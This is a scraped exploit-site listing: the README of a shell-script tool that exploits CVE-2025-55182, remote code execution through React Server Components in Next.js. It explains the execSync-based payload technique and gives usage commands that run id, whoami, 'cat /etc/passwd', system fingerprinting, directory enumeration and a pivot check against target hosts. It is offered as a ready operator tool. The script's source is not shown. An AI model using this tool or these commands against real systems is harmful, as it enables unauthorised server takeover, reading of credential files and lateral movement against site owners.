Share
## https://sploitus.com/exploit?id=EBDD005C-4A80-5B6C-8D03-0B1A6176E192
CVE-2025-55182 Advanced Scanner

A full-featured exploitation utility for CVE-2025-55182 โ€” Remote Code Execution via React Server Components in Next.js.
The scanner automatically crafts the multipart payload and abuses process.mainModule.require('child_process').execSync() to achieve arbitrary OS command execution on vulnerable instances.


Features

Auto payload generator โ€” no manual encoding required
Command execution with clean STDOUT extraction
Automatic protocol detection (https:// applied if missing)
Proper URL decoding + newline restoration
Colored rich output for quick operator feedback
Error fingerprinting (500 / 403 / SSL / timeout / WAF patterns)

Installation
chmod +x scanner.sh

Usage
# Default scan (executes 'id')
./scanner.sh -d vulnerable-app.com

# Custom command execution
./scanner.sh -d vulnerable-app.com -c "whoami"

# With explicit protocol
./scanner.sh -d http://localhost:3000 -c "cat /etc/passwd"

Options


Examples
# Verify RCE
./scanner.sh -d shop.example.com

# System fingerprinting
./scanner.sh -d shop.example.com -c "uname -a"

# Enum writable paths
./scanner.sh -d shop.example.com -c "ls -la /var/www"

# Pivot helper โ€” check outbound access
./scanner.sh -d shop.example.com -c "ping -c 4 google.com"


Feel free to reach out on mailto:dev.vaibhavk@gmail.com